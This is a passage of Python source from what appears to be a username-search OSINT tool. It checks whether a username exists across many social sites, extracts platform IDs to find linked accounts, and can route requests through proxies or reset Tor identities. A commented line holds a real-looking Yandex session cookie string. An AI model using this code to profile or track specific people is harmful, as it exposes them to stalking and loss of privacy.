
        if "headers" in net_info:
            # Override/append any extra headers required by a given site.
            headers.update(net_info["headers"])

        # URL of user on site (if it exists)
        url = net_info.get('url').format(username)

        # Don't make request if username is invalid for the site
        regex_check = net_info.get("regexCheck")
        if regex_check and re.search(regex_check, username) is None:
            # No need to do the check at the site: this user name is not allowed.
            results_site['status'] = QueryResult(username, social_network, url,
                                                 QueryStatus.ILLEGAL)
            results_site["url_user"] = ""
            results_site['http_status'] = ""
            results_site['response_text'] = ""
            query_notify.update(results_site['status'])
        else:
            # URL of user on site (if it exists)
            results_site["url_user"] = url
            url_probe = net_info.get("urlProbe")
            if url_probe is None:
                # Probe URL is normal one seen by people out on the web.
                url_probe = url
            else:
                # There is a special URL for probing existence separate
                # from where the user profile normally can be found.
                url_probe = url_probe.format(username)

            if (net_info["errorType"] == 'status_code'
                    and net_info.get("request_head_only", True) == True):
                #In most cases when we are detecting by status code,
                #it is not necessary to get the entire body:  we can
                #detect fine with just the HEAD response.
                request_method = session.head
            else:
                #Either this detect method needs the content associated
                #with the GET response, or this specific website will
                #not respond properly unless we request the whole page.
                request_method = session.get

            if net_info["errorType"] == "response_url":
                # Site forwards request to a different URL if username not
                # found.  Disallow the redirect so we can capture the
                # http status from the original URL request.
                allow_redirects = False
            else:
                # Allow whatever redirect that the site wants to do.
                # The final result of the request will be what is available.
                allow_redirects = True

            def parse_cookies(cookies_str):
                cookies = SimpleCookie()
                cookies.load(cookies_str)
                return {key: morsel.value for key, morsel in cookies.items()}

            # cookies_str = 'collections_gid=117041; cph=948; cpw=550; yandexuid=6894705951593339704; i=NJAxWCDEQdhKbNGBppYN/5sl4XuX2Lq/lgZELKOVfjfX3boBnqOMyP0s0MSwcBbeuqPaRqjWPrsSXORVLDlLJ7Qi+RI=; font_loaded=YSv1; yuidss=6894705951593339704; ymex=1908699704.yrts.1593339704; _ym_wasSynced=%7B%22time%22%3A1593339704889%2C%22params%22%3A%7B%22eu%22%3A0%7D%2C%22bkParams%22%3A%7B%7D%7D; gdpr=0; _ym_uid=1593339705197323602; _ym_d=1593339705; mda=0; _ym_isad=2; ar=1593339710541646-252043; _ym_visorc_10630330=b; spravka=dD0xNTkzMzM5NzIyO2k9NS4yMjguMjI0LjM3O3U9MTU5MzMzOTcyMjM2MDI4NTg0MjtoPWM3NThkYjU0MzYyMzViZDEwMzU3ZGY3NTUwYzViNDE1'
            cookies_str = ''

            if 'yandex' in url_probe:
                # import logging
                # logging.error(cookies_str)
                cookies = parse_cookies(cookies_str)
            else:
                cookies = None

            # This future starts running the request in a new thread, doesn't block the main thread
            if proxy is not None:
                proxies = {"http": proxy, "https": proxy}
                future = request_method(
                    url=url_probe,
                    headers=headers,
                    proxies=proxies,
                    allow_redirects=allow_redirects,
                    timeout=timeout,
                    # cookies=cookies
                )
            else:
                future = request_method(
                    url=url_probe,
                    headers=headers,
                    allow_redirects=allow_redirects,
                    timeout=timeout,
                    # cookies=cookies
                )

            # Store future in data for access later
            net_info["request_future"] = future

            # Reset identify for tor (if needed)
            if unique_tor:
                underlying_request.reset_identity()

        # Add this site's results into final dictionary with all of the other results.
        results_total[social_network] = results_site

    # Open the file containing account links
    # Core logic: If tor requests, make them here. If multi-threaded requests, wait for responses
    for social_network, net_info in site_data.items():

        # Retrieve results again
        results_site = results_total.get(social_network)
        if not results_site:
            continue

        # Retrieve other site information again
        url = results_site.get("url_user")
        status = results_site.get("status")
        if status is not None:
            # We have already determined the user doesn't exist here
            continue

        # Get the expected error type
        error_type = net_info["errorType"]

        # Get the failure messages and comments
        failure_errors = net_info.get("errors", {})

        # Retrieve future and ensure it has finished
        future = net_info["request_future"]
        r, error_text, expection_text = get_response(
            request_future=future,
            error_type=error_type,
            social_network=social_network)

        #Get response time for response of our request.
        try:
            response_time = r.elapsed
        except AttributeError:
            response_time = None

        # Attempt to get request information
        try:
            http_status = r.status_code
        except:
            http_status = "?"
        try:
            response_text = r.text.encode(r.encoding)
            # Extract IDs data from page
        except:
            response_text = ""

        # Detect failures such as a country restriction
        for text, comment in failure_errors.items():
            if r.text and text in r.text:
                error_context = "Some error"
                error_text = comment
                break

        # workaround for 403 empty page
        if not r is None and r.status_code == 403:
            error_context = "Access denied"
            error_text = "Access denied, use proxy/vpn"

        # TODO: return error for captcha and some specific cases (CashMe)
        # make all result invalid

        extracted_ids_data = ""

        if ids_search and r:
            # print(r.text)
            extracted_ids_data = extract(r.text)

            if extracted_ids_data:
                new_usernames = {}
                for k, v in extracted_ids_data.items():
                    if 'username' in k:
                        new_usernames[v] = 'username'
                    if k in ('yandex_public_id', 'wikimapia_uid', 'gaia_id'):
                        new_usernames[v] = k

                results_site['ids_usernames'] = new_usernames

        if error_text is not None:
            result = QueryResult(username,
                                 social_network,
                                 url,
                                 QueryStatus.UNKNOWN,
                                 ids_data=extracted_ids_data,
                                 query_time=response_time,
                                 context=error_text)
        elif error_type == "message":
            error = net_info.get("errorMsg")
            errors_set = set(error) if type(error) == list else set({error})
            # Checks if the error message is in the HTML
            error_found = any([(err in r.text) for err in errors_set])
            if not error_found:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.CLAIMED,
                                     ids_data=extracted_ids_data,
                                     query_time=response_time)
            else:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.AVAILABLE,
                                     ids_data=extracted_ids_data,
                                     query_time=response_time)
        elif error_type == "status_code":
            # Checks if the status code of the response is 2XX
            if not r.status_code >= 300 or r.status_code < 200:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.CLAIMED,
                                     ids_data=extracted_ids_data,
                                     query_time=response_time)
            else:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.AVAILABLE,
                                     ids_data=extracted_ids_data,
                                     query_time=response_time)
        elif error_type == "response_url":
            # For this detection method, we have turned off the redirect.
            # So, there is no need to check the response URL: it will always
            # match the request.  Instead, we will ensure that the response
            # code indicates that the request was successful (i.e. no 404, or
            # forward to some odd redirect).
            if 200 <= r.status_code < 300:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.CLAIMED,
                                     ids_data=extracted_ids_data,
                                     query_time=response_time)
            else:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.AVAILABLE,
                                     ids_data=extracted_ids_data,
                                     query_time=response_time)
        else:
            #It should be impossible to ever get here...
            raise ValueError(f"Unknown Error Type '{error_type}' for "
                             f"site '{social_network}'")

        #Notify caller about results of query.
        query_notify.update(result)

        # Save status of request
        results_site['status'] = result

        # Save results from request
        results_site['http_status'] = http_status
        results_site['response_text'] = response_text

        # Add this site's results into final dictionary with all of the other results.
        results_total[social_network] = results_site

    #Notify caller that all queries are finished.
    query_notify.finish()

    return results_total